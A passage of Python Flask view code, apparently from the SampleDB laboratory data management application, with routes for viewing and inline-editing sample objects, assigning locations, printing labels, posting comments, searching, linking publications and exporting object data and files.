get_object_if_current_user_has_read_permissions=get_object_if_current_user_has_read_permissions,
ActionType=models.ActionType,
datetime=datetime,
tags=tags,
users=users,
may_create_log_entry=may_create_log_entry,
instrument_log_categories=instrument_log_categories,
create_log_entry_default=create_log_entry_default,
previous_object_id=previous_object_id,
has_grant_for_previous_object=has_grant_for_previous_object,
languages=get_languages(only_enabled_for_input=True),
ENGLISH=english
)
else:
return flask.render_template(
'objects/forms/form_edit.html',
schema=schema,
data=data,
object_id=object.object_id,
errors=errors,
object_errors=object_errors,
form_data=form_data,
previous_actions=serializer.dumps(previous_actions),
form=form,
referencable_objects=referencable_objects,
sorted_actions=sorted_actions,
get_object_if_current_user_has_read_permissions=get_object_if_current_user_has_read_permissions,
action_type_id_by_action_id=action_type_id_by_action_id,
ActionType=models.ActionType,
datetime=datetime,
tags=tags,
users=users,
mode=mode,
languages=get_languages(),
ENGLISH=english
)
def build_object_location_assignment_confirmation_url(object_location_assignment_id: int) -> None:
confirmation_url = flask.url_for(
'frontend.accept_responsibility_for_object',
t=logic.security_tokens.generate_token(
object_location_assignment_id,
salt='confirm_responsibility',
secret_key=flask.current_app.config['SECRET_KEY']
),
_external=True
)
return confirmation_url
def get_project_if_it_exists(project_id):
try:
return get_project(project_id)
except logic.errors.ProjectDoesNotExistError:
return None
def show_inline_edit(obj, action):
# Set view attributes
related_objects_tree = logic.object_relationships.build_related_objects_tree(obj.id, flask_login.current_user.id)
user_language_id = get_user_language(flask_login.current_user).id
english = get_language(Language.ENGLISH)
object_id = obj.id
user_permissions = get_user_object_permissions(object_id=object_id, user_id=flask_login.current_user.id)
user_may_grant = Permissions.GRANT in user_permissions
user_may_use_as_template = Permissions.READ in get_user_action_permissions(obj.action_id, user_id=flask_login.current_user.id)
new_schema_available = True if action.schema != obj.schema else False
instrument = get_instrument_with_translation_in_language(action.instrument_id,
user_language_id) if action.instrument else None
object_type = get_action_type_with_translation_in_language(
action_type_id=action.type_id,
language_id=user_language_id
).translation.object_name
object_log_entries = object_log.get_object_log_entries(object_id=obj.id, user_id=flask_login.current_user.id)
dataverse_enabled = bool(flask.current_app.config['DATAVERSE_URL'])
if dataverse_enabled:
dataverse_url = logic.dataverse_export.get_dataverse_url(obj.id)
show_dataverse_export = not dataverse_url
else:
dataverse_url = None
show_dataverse_export = False
serializer = itsdangerous.URLSafeTimedSerializer(flask.current_app.config['SECRET_KEY'], salt='mobile-upload')
token = serializer.dumps([flask_login.current_user.id, object_id])
mobile_upload_url = flask.url_for('.mobile_file_upload', object_id=object_id, token=token, _external=True)
mobile_upload_qrcode = generate_qrcode(mobile_upload_url, should_cache=False)
object_url = flask.url_for('.object', object_id=object_id, _external=True)
object_qrcode = generate_qrcode(object_url, should_cache=True)
location_form = ObjectLocationAssignmentForm()
locations_map, locations_tree = get_locations_tree()
locations = [('-1', '—')]
unvisited_location_ids_prefixes_and_subtrees = [(location_id, '', locations_tree[location_id]) for location_id in
locations_tree]
while unvisited_location_ids_prefixes_and_subtrees:
location_id, prefix, subtree = unvisited_location_ids_prefixes_and_subtrees.pop(0)
location = locations_map[location_id]
locations.append(
(str(location_id), '{}{} (#{})'.format(prefix, get_translated_text(location.name), location.id)))
for location_id in sorted(subtree, key=lambda location_id: get_translated_text(locations_map[location_id].name),
reverse=True):
unvisited_location_ids_prefixes_and_subtrees.insert(
0, (location_id, f'{prefix}{get_translated_text(location.name)} / ', subtree[location_id])
)
location_form.location.choices = locations
possible_responsible_users = [('-1', '—')]
for user in logic.users.get_users(exclude_hidden=True):
possible_responsible_users.append((str(user.id), '{} (#{})'.format(user.name, user.id)))
location_form.responsible_user.choices = possible_responsible_users
measurement_actions = logic.action_translations.get_actions_with_translation_in_language(user_language_id,
models.ActionType.MEASUREMENT,
use_fallback=True)
favorite_action_ids = logic.favorites.get_user_favorite_action_ids(flask_login.current_user.id)
favorite_measurement_actions = [
action
for action in measurement_actions
if action.id in favorite_action_ids and not action.is_hidden
]
# Sort by: instrument name (independent actions first), action name
favorite_measurement_actions.sort(key=lambda action: (
action.user.name.lower() if action.user else '',
get_instrument_with_translation_in_language(action.instrument_id,
user_language_id).translation.name.lower() if action.instrument else '',
action.translation.name.lower()
))
publication_form = ObjectPublicationForm()
object_publications = logic.publications.get_publications_for_object(object_id=obj.id)
user_may_link_publication = True
notebook_templates = get_notebook_templates(
object_id=obj.id,
data=obj.data,
schema=obj.schema,
user_id=flask_login.current_user.id
)
linked_project = logic.projects.get_project_linked_to_object(object_id)
object_languages = logic.languages.get_languages_in_object_data(obj.data)
languages = []
for lang_code in object_languages:
languages.append(get_language_by_lang_code(lang_code))
all_languages = get_languages()
metadata_language = flask.request.args.get('language', None)
if not any(
language.lang_code == metadata_language
for language in languages
):
metadata_language = None
view_kwargs = {
"template_mode": "inline_edit",
"show_object_type_and_id_on_object_page_text": get_user_settings(flask_login.current_user.id)["SHOW_OBJECT_TYPE_AND_ID_ON_OBJECT_PAGE"],
"show_object_title": get_user_settings(flask_login.current_user.id)["SHOW_OBJECT_TITLE"],
"measurement_type_name": logic.action_type_translations.get_action_type_translation_for_action_type_in_language(
action_type_id=logic.actions.models.ActionType.MEASUREMENT,
language_id=logic.languages.get_user_language(flask_login.current_user).id,
use_fallback=True
).name,
"metadata_language": metadata_language,
"languages": languages,
"all_languages": all_languages,
"SUPPORTED_LOCALES": logic.locale.SUPPORTED_LOCALES,
"ENGLISH": english,
"object_type": object_type,
"action": action,
"action_type": get_action_type_with_translation_in_language(action.type_id, user_language_id),
"instrument": instrument,
"schema": obj.schema,
"data": obj.data,
"object_log_entries": object_log_entries,
"ObjectLogEntryType": ObjectLogEntryType,
"last_edit_datetime": obj.utc_datetime,
"last_edit_user": get_user(obj.user_id),
"object_id": object_id,
"user_may_edit": True,
"user_may_comment": True,
"comments": comments.get_comments_for_object(object_id),
"comment_form": CommentForm(),
"files": logic.files.get_files_for_object(object_id),
"file_source_instrument_exists": False,
"file_source_jupyterhub_exists": False,
"file_form": FileForm(),
"external_link_form": ExternalLinkForm(),
"external_link_invalid": 'invalid_link' in flask.request.args,
"mobile_upload_url": mobile_upload_url,
"mobile_upload_qrcode": mobile_upload_qrcode,
"notebook_templates": notebook_templates,
"object_qrcode": object_qrcode,
"object_url": object_url,
"restore_form": None,
"version_id": obj.version_id,
"user_may_grant": user_may_grant,
"favorite_measurement_actions": favorite_measurement_actions,
"FileLogEntryType": FileLogEntryType,
"file_information_form": FileInformationForm(),
"file_hiding_form": FileHidingForm(),
"new_schema_available": new_schema_available,
"related_objects_tree": related_objects_tree,
"object_publications": object_publications,
"user_may_link_publication": user_may_link_publication,
"user_may_use_as_template": user_may_use_as_template,
"show_dataverse_export": show_dataverse_export,
"dataverse_url": dataverse_url,
"publication_form": publication_form,
"get_object": get_object,
"get_object_if_current_user_has_read_permissions": get_object_if_current_user_has_read_permissions,
"get_object_location_assignment": get_object_location_assignment,
"get_user": get_user,
"get_location": get_location,
"PAGE_SIZES": PAGE_SIZES,
"HORIZONTAL_LABEL_MARGIN": HORIZONTAL_LABEL_MARGIN,
"VERTICAL_LABEL_MARGIN": VERTICAL_LABEL_MARGIN,
"mm": mm,
"object_location_assignments": get_object_location_assignments(object_id),
"build_object_location_assignment_confirmation_url": build_object_location_assignment_confirmation_url,
"user_may_assign_location": True,
"location_form": location_form,
"project": linked_project,
"get_project": get_project_if_it_exists,
"get_action_type": get_action_type,
"get_action_type_with_translation_in_language": get_action_type_with_translation_in_language,
"get_instrument_with_translation_in_language": get_instrument_with_translation_in_language
}
# form kwargs
if action is not None and action.instrument is not None and flask_login.current_user in action.instrument.responsible_users:
instrument_log_categories = logic.instrument_log_entries.get_instrument_log_categories(action.instrument.id)
if 'create_instrument_log_entry' in flask.request.form:
category_ids = []
for category_id in flask.request.form.getlist('instrument_log_categories'):
try:
if int(category_id) in [category.id for category in instrument_log_categories]:
category_ids.append(int(category_id))
except Exception:
pass
errors = []
object_errors = {}
form_data = {}
previous_actions = []
serializer = itsdangerous.URLSafeSerializer(flask.current_app.config['SECRET_KEY'])
form = ObjectForm()
if flask.request.method != 'GET' and form.validate_on_submit():
raw_form_data = {key: flask.request.form.getlist(key) for key in flask.request.form}
form_data = {k: v[0] for k, v in raw_form_data.items()}
if 'input_num_batch_objects' in form_data:
try:
num_objects_in_batch = int(form_data['input_num_batch_objects'])
except ValueError:
try:
# The form allows notations like '1.2e1' for '12', however
# Python can only parse these as floats
num_objects_in_batch = float(form_data['input_num_batch_objects'])
if num_objects_in_batch == int(num_objects_in_batch):
num_objects_in_batch = int(num_objects_in_batch)
else:
raise
except ValueError:
errors.append('input_num_batch_objects')
else:
form_data['input_num_batch_objects'] = str(num_objects_in_batch)
else:
form_data['input_num_batch_objects'] = str(num_objects_in_batch)
if 'previous_actions' in flask.request.form:
try:
previous_actions = serializer.loads(flask.request.form['previous_actions'])
except itsdangerous.BadData:
flask.abort(400)
if not flask.current_app.config["LOAD_OBJECTS_IN_BACKGROUND"]:
referencable_objects = get_objects_with_permissions(
user_id=flask_login.current_user.id,
permissions=Permissions.READ
)
if object is not None:
referencable_objects = [
referencable_object
for referencable_object in referencable_objects
if referencable_object.object_id != object_id
]
else:
referencable_objects = []
sorted_actions = get_sorted_actions_for_user(
user_id=flask_login.current_user.id
)
for action in sorted_actions:
db.session.expunge(action)
action_type_id_by_action_id = {}
for action_type in get_action_types():
for action in get_actions(action_type.id):
action_type_id_by_action_id[action.id] = action_type.id
tags = [{'name': tag.name, 'uses': tag.uses} for tag in logic.tags.get_tags()]
users = get_users(exclude_hidden=True)
users.sort(key=lambda user: user.id)
english = get_language(Language.ENGLISH)
form_kwargs = {
"errors": errors,
"object_errors": object_errors,
"form_data": form_data,
"previous_actions": serializer.dumps(previous_actions),
"form": form,
"referencable_objects": referencable_objects,
"sorted_actions": sorted_actions,
"action_type_id_by_action_id": action_type_id_by_action_id,
"ActionType": models.ActionType,
"datetime": datetime,
"tags": tags,
"users": users,
"mode": 'edit',
"languages": get_languages(),
"ENGLISH": english
}
kwargs = {**view_kwargs, **form_kwargs}
return flask.render_template('objects/inline_edit/inline_edit_base.html', **kwargs)
def get_object_if_current_user_has_read_permissions(object_id):
user_id = flask_login.current_user.id
try:
permissions = get_user_object_permissions(object_id, user_id)
except ObjectDoesNotExistError:
return None
if Permissions.READ not in permissions:
return None
return get_object(object_id)
@frontend.route('/objects/<int:object_id>', methods=['GET', 'POST'])
@object_permissions_required(Permissions.READ, on_unauthorized=on_unauthorized)
def object(object_id):
object = get_object(object_id=object_id)
related_objects_tree = logic.object_relationships.build_related_objects_tree(object_id, flask_login.current_user.id)
user_language_id = get_user_language(flask_login.current_user).id
english = get_language(Language.ENGLISH)
object_languages = set()
user_permissions = get_user_object_permissions(object_id=object_id, user_id=flask_login.current_user.id)
user_may_edit = Permissions.WRITE in user_permissions
user_may_grant = Permissions.GRANT in user_permissions
user_may_use_as_template = Permissions.READ in get_user_action_permissions(object.action_id, user_id=flask_login.current_user.id)
action = get_action_with_translation_in_language(object.action_id, user_language_id, use_fallback=True)
if action.schema != object.schema:
new_schema_available = True
else:
new_schema_available = False
if not user_may_edit and flask.request.args.get('mode', '') == 'edit':
return flask.abort(403)
if not user_may_edit and flask.request.args.get('mode', '') == 'upgrade':
return flask.abort(403)
if not flask.current_app.config['DISABLE_INLINE_EDIT']:
if not user_may_edit and flask.request.args.get('mode', '') == 'inline_edit':
return flask.abort(403)
if user_may_edit and flask.request.method == 'GET' and flask.request.args.get('mode', '') in {'', 'inline_edit'}:
return show_inline_edit(object, get_action(object.action_id))
if flask.request.method == 'GET' and flask.request.args.get('mode', '') not in ('edit', 'upgrade'):
instrument = get_instrument_with_translation_in_language(action.instrument_id, user_language_id) if action.instrument else None
object_type = get_action_type_with_translation_in_language(
action_type_id=action.type_id,
language_id=user_language_id
).translation.object_name
object_log_entries = object_log.get_object_log_entries(object_id=object_id, user_id=flask_login.current_user.id)
dataverse_enabled = bool(flask.current_app.config['DATAVERSE_URL'])
if dataverse_enabled:
dataverse_url = logic.dataverse_export.get_dataverse_url(object_id)
show_dataverse_export = user_may_grant and not dataverse_url
else:
dataverse_url = None
show_dataverse_export = False
if user_may_edit:
serializer = itsdangerous.URLSafeTimedSerializer(flask.current_app.config['SECRET_KEY'], salt='mobile-upload')
token = serializer.dumps([flask_login.current_user.id, object_id])
mobile_upload_url = flask.url_for('.mobile_file_upload', object_id=object_id, token=token, _external=True)
mobile_upload_qrcode = generate_qrcode(mobile_upload_url, should_cache=False)
else:
mobile_upload_url = None
mobile_upload_qrcode = None
object_url = flask.url_for('.object', object_id=object_id, _external=True)
object_qrcode = generate_qrcode(object_url, should_cache=True)
location_form = ObjectLocationAssignmentForm()
locations_map, locations_tree = get_locations_tree()
locations = [('-1', '—')]
unvisited_location_ids_prefixes_and_subtrees = [(location_id, '', locations_tree[location_id]) for location_id in locations_tree]
while unvisited_location_ids_prefixes_and_subtrees:
location_id, prefix, subtree = unvisited_location_ids_prefixes_and_subtrees.pop(0)
location = locations_map[location_id]
locations.append((str(location_id), '{}{} (#{})'.format(prefix, get_translated_text(location.name), location.id)))
for location_id in sorted(subtree, key=lambda location_id: get_translated_text(locations_map[location_id].name), reverse=True):
unvisited_location_ids_prefixes_and_subtrees.insert(0, (location_id, '{}{} / '.format(prefix, get_translated_text(location.name)), subtree[location_id]))
location_form.location.choices = locations
possible_responsible_users = [('-1', '—')]
for user in logic.users.get_users(exclude_hidden=True):
possible_responsible_users.append((str(user.id), '{} (#{})'.format(user.name, user.id)))
location_form.responsible_user.choices = possible_responsible_users
measurement_actions = logic.action_translations.get_actions_with_translation_in_language(user_language_id, models.ActionType.MEASUREMENT, use_fallback=True)
favorite_action_ids = logic.favorites.get_user_favorite_action_ids(flask_login.current_user.id)
favorite_measurement_actions = [
action
for action in measurement_actions
if action.id in favorite_action_ids and not action.is_hidden
]
# Sort by: instrument name (independent actions first), action name
favorite_measurement_actions.sort(key=lambda action: (
action.user.name.lower() if action.user else '',
get_instrument_with_translation_in_language(action.instrument_id, user_language_id).translation.name.lower() if action.instrument else '',
action.translation.name.lower()
))
publication_form = ObjectPublicationForm()
object_publications = logic.publications.get_publications_for_object(object_id=object.id)
user_may_link_publication = Permissions.WRITE in user_permissions
notebook_templates = get_notebook_templates(
object_id=object.id,
data=object.data,
schema=object.schema,
user_id=flask_login.current_user.id
)
linked_project = logic.projects.get_project_linked_to_object(object_id)
object_languages = logic.languages.get_languages_in_object_data(object.data)
languages = []
for lang_code in object_languages:
languages.append(get_language_by_lang_code(lang_code))
all_languages = get_languages()
metadata_language = flask.request.args.get('language', None)
if not any(
language.lang_code == metadata_language
for language in languages
):
metadata_language = None
return flask.render_template(
'objects/view/base.html',
template_mode="view",
show_object_type_and_id_on_object_page_text=get_user_settings(flask_login.current_user.id)["SHOW_OBJECT_TYPE_AND_ID_ON_OBJECT_PAGE"],
show_object_title=get_user_settings(flask_login.current_user.id)["SHOW_OBJECT_TITLE"],
measurement_type_name=logic.action_type_translations.get_action_type_translation_for_action_type_in_language(
action_type_id=logic.actions.models.ActionType.MEASUREMENT,
language_id=logic.languages.get_user_language(flask_login.current_user).id,
use_fallback=True
).name,
metadata_language=metadata_language,
languages=languages,
all_languages=all_languages,
SUPPORTED_LOCALES=logic.locale.SUPPORTED_LOCALES,
ENGLISH=english,
object_type=object_type,
action=action,
action_type=get_action_type_with_translation_in_language(action.type_id, user_language_id),
instrument=instrument,
schema=object.schema,
data=object.data,
object_log_entries=object_log_entries,
ObjectLogEntryType=ObjectLogEntryType,
last_edit_datetime=object.utc_datetime,
last_edit_user=get_user(object.user_id),
object_id=object_id,
user_may_edit=user_may_edit,
user_may_comment=user_may_edit,
comments=comments.get_comments_for_object(object_id),
comment_form=CommentForm(),
files=logic.files.get_files_for_object(object_id),
file_source_instrument_exists=False,
file_source_jupyterhub_exists=False,
file_form=FileForm(),
external_link_form=ExternalLinkForm(),
external_link_invalid='invalid_link' in flask.request.args,
mobile_upload_url=mobile_upload_url,
mobile_upload_qrcode=mobile_upload_qrcode,
notebook_templates=notebook_templates,
object_qrcode=object_qrcode,
object_url=object_url,
restore_form=None,
version_id=object.version_id,
user_may_grant=user_may_grant,
favorite_measurement_actions=favorite_measurement_actions,
FileLogEntryType=FileLogEntryType,
file_information_form=FileInformationForm(),
file_hiding_form=FileHidingForm(),
new_schema_available=new_schema_available,
related_objects_tree=related_objects_tree,
object_publications=object_publications,
user_may_link_publication=user_may_link_publication,
user_may_use_as_template=user_may_use_as_template,
show_dataverse_export=show_dataverse_export,
dataverse_url=dataverse_url,
publication_form=publication_form,
get_object=get_object,
get_object_if_current_user_has_read_permissions=get_object_if_current_user_has_read_permissions,
get_object_location_assignment=get_object_location_assignment,
get_user=get_user,
get_location=get_location,
PAGE_SIZES=PAGE_SIZES,
HORIZONTAL_LABEL_MARGIN=HORIZONTAL_LABEL_MARGIN,
VERTICAL_LABEL_MARGIN=VERTICAL_LABEL_MARGIN,
mm=mm,
object_location_assignments=get_object_location_assignments(object_id),
build_object_location_assignment_confirmation_url=build_object_location_assignment_confirmation_url,
user_may_assign_location=user_may_edit,
location_form=location_form,
project=linked_project,
get_project=get_project_if_it_exists,
get_action_type=get_action_type,
get_action_type_with_translation_in_language=get_action_type_with_translation_in_language,
get_instrument_with_translation_in_language=get_instrument_with_translation_in_language
)
check_current_user_is_not_readonly()
if flask.request.args.get('mode', '') == 'upgrade':
should_upgrade_schema = True
else:
should_upgrade_schema = False
return show_object_form(object, action=get_action(object.action_id), should_upgrade_schema=should_upgrade_schema)
@frontend.route('/objects/<int:object_id>/dc.rdf')
@frontend.route('/objects/<int:object_id>/versions/<int:version_id>/dc.rdf')
@object_permissions_required(Permissions.READ, on_unauthorized=on_unauthorized)
def object_rdf(object_id, version_id=None):
rdf_xml = logic.rdf.generate_rdf(flask_login.current_user.id, object_id, version_id)
return flask.Response(
rdf_xml,
mimetype='application/rdf+xml',
)
@frontend.route('/objects/<int:object_id>/label')
@object_permissions_required(Permissions.READ, on_unauthorized=on_unauthorized)
def print_object_label(object_id):
mode = flask.request.args.get('mode', 'mixed')
if mode == 'fixed-width':
create_mixed_labels = False
create_long_labels = False
include_qrcode_in_long_labels = None
paper_format = flask.request.args.get('width-paper-format', '')
if paper_format not in PAGE_SIZES:
paper_format = DEFAULT_PAPER_FORMAT
maximum_width = math.floor(PAGE_SIZES[paper_format][0] / mm - 2 * HORIZONTAL_LABEL_MARGIN)
maximum_height = math.floor(PAGE_SIZES[paper_format][1] / mm - 2 * VERTICAL_LABEL_MARGIN)
ghs_classes_side_by_side = 'side-by-side' in flask.request.args
label_minimum_width = 20
if ghs_classes_side_by_side:
label_minimum_width = 40
try:
label_width = float(flask.request.args.get('label-width', '20'))
except ValueError:
label_width = 0
if math.isnan(label_width):
label_width = 0
if label_width < label_minimum_width:
label_width = label_minimum_width
if label_width > maximum_width:
label_width = maximum_width
try:
label_minimum_height = float(flask.request.args.get('label-minimum-height', '0'))
except ValueError:
label_minimum_height = 0
if math.isnan(label_minimum_height):
label_minimum_height = 0
if label_minimum_height < 0:
label_minimum_height = 0
if label_minimum_height > maximum_height:
label_minimum_height = maximum_height
qrcode_width = 18
centered = 'centered' in flask.request.args
elif mode == 'minimum-height':
create_mixed_labels = False
create_long_labels = True
paper_format = flask.request.args.get('height-paper-format', '')
if paper_format not in PAGE_SIZES:
paper_format = DEFAULT_PAPER_FORMAT
maximum_width = math.floor(PAGE_SIZES[paper_format][0] / mm - 2 * HORIZONTAL_LABEL_MARGIN)
include_qrcode_in_long_labels = 'include-qrcode' in flask.request.args
label_width = 0
label_minimum_height = 0
try:
label_minimum_width = float(flask.request.args.get('label-minimum-width', '0'))
except ValueError:
label_minimum_width = 0
if math.isnan(label_minimum_width):
label_minimum_width = 0
if label_minimum_width < 0:
label_minimum_width = 0
if label_minimum_width > maximum_width:
label_minimum_width = maximum_width
qrcode_width = 0
ghs_classes_side_by_side = None
centered = None
else:
create_mixed_labels = True
create_long_labels = None
include_qrcode_in_long_labels = None
paper_format = flask.request.args.get('mixed-paper-format', '')
if paper_format not in PAGE_SIZES:
paper_format = DEFAULT_PAPER_FORMAT
label_width = 0
label_minimum_height = 0
qrcode_width = 0
label_minimum_width = 0
ghs_classes_side_by_side = None
centered = None
object = get_object(object_id=object_id)
object_log_entries = object_log.get_object_log_entries(object_id=object_id, user_id=flask_login.current_user.id)
for object_log_entry in object_log_entries:
if object_log_entry.type in (ObjectLogEntryType.CREATE_OBJECT, ObjectLogEntryType.CREATE_BATCH):
creation_date = object_log_entry.utc_datetime.strftime('%Y-%m-%d')
creation_user = get_user(object_log_entry.user_id).name
break
else:
creation_date = _('Unknown')
creation_user = _('Unknown')
if 'created' in object.data and '_type' in object.data['created'] and object.data['created']['_type'] == 'datetime':
creation_date = object.data['created']['utc_datetime'].split(' ')[0]
if 'name' in object.data and '_type' in object.data['name'] and object.data['name']['_type'] == 'text':
object_name = get_translated_text(object.data['name']['text'])
else:
object_name = _('Unknown Object')
object_url = flask.url_for('.object', object_id=object_id, _external=True)
if 'hazards' in object.data and '_type' in object.data['hazards'] and object.data['hazards']['_type'] == 'hazards':
hazards = object.data['hazards']['hazards']
else:
hazards = []
pdf_data = create_labels(
object_id=object_id,
object_name=object_name,
object_url=object_url,
creation_user=creation_user,
creation_date=creation_date,
ghs_classes=hazards,
paper_format=paper_format,
create_mixed_labels=create_mixed_labels,
create_long_labels=create_long_labels,
include_qrcode_in_long_labels=include_qrcode_in_long_labels,
label_width=label_width,
label_minimum_height=label_minimum_height,
label_minimum_width=label_minimum_width,
qrcode_width=qrcode_width,
ghs_classes_side_by_side=ghs_classes_side_by_side,
centered=centered
)
return flask.send_file(
io.BytesIO(pdf_data),
mimetype='application/pdf',
cache_timeout=-1
)
@frontend.route('/objects/<int:object_id>/comments/', methods=['POST'])
@object_permissions_required(Permissions.WRITE)
def post_object_comments(object_id):
check_current_user_is_not_readonly()
comment_form = CommentForm()
if comment_form.validate_on_submit():
content = comment_form.content.data
comments.create_comment(object_id=object_id, user_id=flask_login.current_user.id, content=content)
flask.flash(_('Successfully posted a comment.'), 'success')
else:
flask.flash(_('Please enter a comment text.'), 'error')
return flask.redirect(flask.url_for('.object', object_id=object_id))
@frontend.route('/objects/search/')
@flask_login.login_required
def search():
actions = get_sorted_actions_for_user(
user_id=flask_login.current_user.id
)
user_language_id = get_user_language(flask_login.current_user).id
action_types = get_action_types_with_translations_in_language(user_language_id)
search_paths = {}
search_paths_by_action = {}
search_paths_by_action_type = {}
for action_type in action_types:
search_paths_by_action_type[action_type.id] = {}
for action in actions:
search_paths_by_action[action.id] = {}
if action.type_id not in search_paths_by_action_type:
search_paths_by_action_type[action.type_id] = {}
for property_path, property_type in logic.schemas.utils.get_property_paths_for_schema(
schema=action.schema,
valid_property_types={'text', 'bool', 'quantity', 'datetime'}
).items():
property_path = '.'.join(
key if key is not None else '?'
for key in property_path
)
search_paths_by_action[action.id][property_path] = [property_type]
if property_path not in search_paths_by_action_type[action.type_id]:
search_paths_by_action_type[action.type_id][property_path] = [property_type]
elif property_type not in search_paths_by_action_type[action.type_id][property_path]:
search_paths_by_action_type[action.type_id][property_path].append(property_type)
if property_path not in search_paths:
search_paths[property_path] = [property_type]
elif property_type not in search_paths[property_path]:
search_paths[property_path].append(property_type)
return flask.render_template(
'search.html',
search_paths=search_paths,
search_paths_by_action=search_paths_by_action,
search_paths_by_action_type=search_paths_by_action_type,
actions=actions,
action_types=action_types,
datetime=datetime
), 200, {
'Cache-Control': 'no-cache, no-store, must-revalidate',
'Pragma': 'no-cache',
'Expires': '0'
}
@frontend.route('/objects/referencable')
@flask_login.login_required
def referencable_objects():
required_perm = Permissions.READ
if 'required_perm' in flask.request.args:
try:
required_perm = Permissions.from_name(flask.request.args['required_perm'])
except ValueError:
try:
required_perm = Permissions(int(flask.request.args['required_perm']))
except ValueError:
return {
"message": "argument {} is not a valid permission.".format(flask.request.args['required_perm'])
}, 400
referencable_objects = get_object_info_with_permissions(
user_id=flask_login.current_user.id,
permissions=required_perm,
)
def dictify(x):
return {
'id': x.object_id,
'text': flask.escape('{} (#{})'.format(get_translated_text(x.name_json), x.object_id)),
'action_id': x.action_id,
'max_permission': x.max_permission,
'tags': [flask.escape(tag) for tag in x.tags['tags']] if x.tags and isinstance(x.tags, dict) and x.tags.get('_type') == 'tags' and x.tags.get('tags') else []
}
return {'referencable_objects': [dictify(x) for x in referencable_objects]}
@frontend.route('/objects/<int:object_id>/permissions/request', methods=['POST'])
@flask_login.login_required
def object_permissions_request(object_id):
current_permissions = get_user_object_permissions(object_id=object_id, user_id=flask_login.current_user.id)
if Permissions.READ in current_permissions:
flask.flash(_('You already have permissions to access this object.'), 'error')
return flask.redirect(flask.url_for('.object', object_id=object_id))
request_object_permissions(flask_login.current_user.id, object_id)
flask.flash(_('Your request for permissions has been sent.'), 'success')
return flask.redirect(flask.url_for('.objects'))
@frontend.route('/objects/<int:object_id>/locations/', methods=['POST'])
@object_permissions_required(Permissions.WRITE)
def post_object_location(object_id):
check_current_user_is_not_readonly()
location_form = ObjectLocationAssignmentForm()
location_form.location.choices = [('-1', '—')] + [
(str(location.id), '{} (#{})'.format(location.name, location.id))
for location in get_locations()
]
possible_responsible_users = [('-1', '—')]
for user in logic.users.get_users(exclude_hidden=True):
possible_responsible_users.append((str(user.id), '{} (#{})'.format(user.name, user.id)))
location_form.responsible_user.choices = possible_responsible_users
if location_form.validate_on_submit():
location_id = int(location_form.location.data)
if location_id < 0:
location_id = None
responsible_user_id = int(location_form.responsible_user.data)
if responsible_user_id < 0:
responsible_user_id = None
description = location_form.description.data
try:
description = json.loads(description)
except Exception:
description = {}
valid_description = {'en': ''}
for language_code, description_text in description.items():
if not isinstance(language_code, str):
continue
try:
language = get_language_by_lang_code(language_code)
except logic.errors.LanguageDoesNotExistError:
continue
if not language.enabled_for_input:
continue
valid_description[language_code] = description_text
description = valid_description
if location_id is not None or responsible_user_id is not None:
assign_location_to_object(object_id, location_id, responsible_user_id, flask_login.current_user.id, description)
flask.flash(_('Successfully assigned a new location to this object.'), 'success')
else:
flask.flash(_('Please select a location or a responsible user.'), 'error')
else:
flask.flash(_('Please select a location or a responsible user.'), 'error')
return flask.redirect(flask.url_for('.object', object_id=object_id))
@frontend.route('/objects/<int:object_id>/publications/', methods=['POST'])
@object_permissions_required(Permissions.WRITE)
def post_object_publication(object_id):
check_current_user_is_not_readonly()
publication_form = ObjectPublicationForm()
if publication_form.validate_on_submit():
doi = publication_form.doi.data
title = publication_form.title.data
object_name = publication_form.object_name.data
if title is not None:
title = title.strip()
if not title:
title = None
if object_name is not None:
object_name = object_name.strip()
if not object_name:
object_name = None
existing_publication = ([
publication
for publication in logic.publications.get_publications_for_object(object_id)
if publication.doi == doi
] or [None])[0]
if existing_publication is not None and existing_publication.title == title and existing_publication.object_name == object_name:
flask.flash(_('This object has already been linked to this publication.'), 'info')
else:
logic.publications.link_publication_to_object(user_id=flask_login.current_user.id, object_id=object_id, doi=doi, title=title, object_name=object_name)
if existing_publication is None:
flask.flash(_('Successfully linked this object to a publication.'), 'success')
else:
flask.flash(_('Successfully updated the information for this publication.'), 'success')
else:
flask.flash(_('Please enter a valid DOI for the publication you want to link this object to.'), 'error')
return flask.redirect(flask.url_for('.object', object_id=object_id))
@frontend.route('/objects/<int:object_id>/export')
@object_permissions_required(Permissions.READ, on_unauthorized=on_unauthorized)
def export_data(object_id):
object_ids = [object_id]
file_extension = flask.request.args.get('format', '.pdf')
if file_extension != '.pdf' and file_extension not in logic.export.FILE_FORMATS:
return flask.abort(400)
if 'object_ids' in flask.request.args:
try:
object_ids = json.loads(flask.request.args['object_ids'])
object_ids = [int(i) for i in object_ids]
if any((Permissions.READ not in get_user_object_permissions(i, flask_login.current_user.id)) for i in object_ids):
return flask.abort(400)
except Exception:
return flask.abort(400)
if not object_ids:
return flask.abort(400)
if file_extension == '.pdf':
sections = pdfexport.SECTIONS
if 'sections' in flask.request.args:
try:
sections = sections.intersection(json.loads(flask.request.args['sections']))
except Exception:
return flask.abort(400)
if 'language' in flask.request.args:
try:
lang_code = flask.request.args['language']
if lang_code not in logic.locale.SUPPORTED_LOCALES:
raise ValueError()
language = logic.languages.get_language_by_lang_code(lang_code)
if not language.enabled_for_user_interface:
raise ValueError()
except Exception:
lang_code = 'en'
else:
lang_code = 'en'
pdf_data = pdfexport.create_pdfexport(object_ids, sections, lang_code)
file_bytes = io.BytesIO(pdf_data)
elif file_extension in logic.export.FILE_FORMATS:
file_bytes = logic.export.FILE_FORMATS[file_extension][1](flask_login.current_user.id, object_ids=object_ids)
else:
file_bytes = None
if file_bytes:
return flask.Response(
file_bytes,
200,
headers={
'Content-Disposition': f'attachment; filename=sampledb_export{file_extension}',
'Content-Type': 'application/pdf' if file_extension == '.pdf' else logic.export.FILE_FORMATS[file_extension][2]
}
)
return flask.abort(500)
@frontend.route('/objects/<int:object_id>/files/')
@object_permissions_required(Permissions.READ, on_unauthorized=on_unauthorized)
def object_files(object_id):
files = logic.files.get_files_for_object(object_id)
zip_bytes = io.BytesIO()
with zipfile.ZipFile(zip_bytes, 'w') as zip_file:
for file in files:
if file.is_hidden:
continue
if file.storage in {'local', 'database'}:
try:
file_bytes = file.open(read_only=True).read()
except Exception:
pass
else:
zip_file.writestr(os.path.basename(file.original_file_name), file_bytes)
return flask.Response(
zip_bytes.getvalue(),
200,
headers={
'Content-Type': 'application/zip',
'Content-Disposition': f'attachment; filename=object_{object_id}_files.zip'
}
)
@frontend.route('/objects/<int:object_id>/files/<int:file_id>', methods=['GET'])
@object_permissions_required(Permissions.READ, on_unauthorized=on_unauthorized)
def object_file(object_id, file_id):
